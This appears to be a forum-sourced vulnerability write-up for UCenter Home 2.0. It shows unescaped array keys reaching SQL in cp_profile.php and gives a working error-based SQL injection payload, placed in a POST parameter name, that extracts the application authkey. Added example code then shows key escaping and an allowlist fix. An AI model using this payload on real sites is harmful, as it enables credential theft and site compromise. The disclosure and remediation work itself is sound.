uc_home 2.0, when magic_quotes_gpc is off, filters only parameter values and ignores parameter names.
function_common.php

```php
function saddslashes($string) {
    if (is_array($string)) {
        foreach ($string as $key => $val) {
            // only the value is escaped; $key is written back untouched
            $string[$key] = saddslashes($val);
        }
    } else {
        $string = addslashes($string);
    }
    return $string;
}
```
cp_profile.php, around line 56

```php
foreach ($_POST['friend'] as $key => $value) {
    $value = intval($value);  // the value is cast to an integer ...
    // ... but $key is interpolated into the SQL string as received
    $inserts[] = "('base','$key','$space[uid]','$value')";
}
$_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'");
$_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend)
    VALUES ".implode(',', $inserts));
```
Exploit:
Requirement: magic_quotes_gpc off
URL: cp.php?ac=profile&op=base
When saving, craft a POST whose parameter name is:
friend[a’,(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),’1′)#]
Parameter value: arbitrary
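The following is an added example and not UCenter Home's own code. It places the page's `saddslashes()` (renamed `saddslashes_original` so both can be defined in one file) next to a hardened variant that escapes array keys as well as values, and adds an allowlist check for the `cp_profile.php` loop, since `subtype` should only ever take one of a fixed set of field names. The `$post` array, the allowlist contents and the uid are constructed values; `tname()` and `$_SGLOBAL['db']` are not used.

```php
<?php
// Added example, not UCenter Home's own code. Shows that the original
// saddslashes() leaves array keys unescaped, one way to escape keys too,
// and an allowlist check before the key is interpolated into SQL.

// Original behaviour, as quoted on the page: keys pass through unchanged.
function saddslashes_original($string) {
    if (is_array($string)) {
        foreach ($string as $key => $val) {
            $string[$key] = saddslashes_original($val);
        }
    } else {
        $string = addslashes($string);
    }
    return $string;
}

// Hardened variant (assumption: one reasonable fix, not the vendor's patch):
// rebuild the array so that every key is escaped along with every value.
function saddslashes_keys($string) {
    if (is_array($string)) {
        $out = array();
        foreach ($string as $key => $val) {
            $out[addslashes($key)] = saddslashes_keys($val);
        }
        return $out;
    }
    return addslashes($string);
}

// Constructed input: a key carrying a single quote, as a client can send
// when magic_quotes_gpc is off.
$post = array('friend' => array("a'b" => '7', 'birthday' => '1'));

$unsafe = saddslashes_original($post);
$safe   = saddslashes_keys($post);

var_dump(array_keys($unsafe['friend']));  // "a'b" survives unescaped
var_dump(array_keys($safe['friend']));    // "a\'b"

// Allowlist for the cp_profile.php loop (hypothetical field names): even with
// escaping in place, subtype should only ever be one of the known values,
// so anything else is dropped before any SQL is built.
$allowed_subtypes = array('birthday', 'blood', 'marriage');  // constructed list
$space_uid = 1;                                              // constructed uid
$inserts = array();
foreach ($safe['friend'] as $key => $value) {
    if (!in_array($key, $allowed_subtypes, true)) {
        continue;  // unknown subtype: skip it instead of interpolating it
    }
    $value = intval($value);
    $inserts[] = "('base','$key','$space_uid','$value')";
}
print_r($inserts);  // only the 'birthday' row remains
```

Escaping keys closes the gap the page describes, but the allowlist is the stronger control here: `subtype` is effectively an identifier chosen by the application, not free text, so rejecting unexpected keys removes the need to trust escaping at all for that column.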
http://t00ls.net/thread-14523-1-1.html